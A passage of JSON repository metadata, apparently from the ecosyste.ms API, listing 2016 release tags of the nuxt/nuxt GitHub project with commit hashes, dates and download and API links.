kg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosy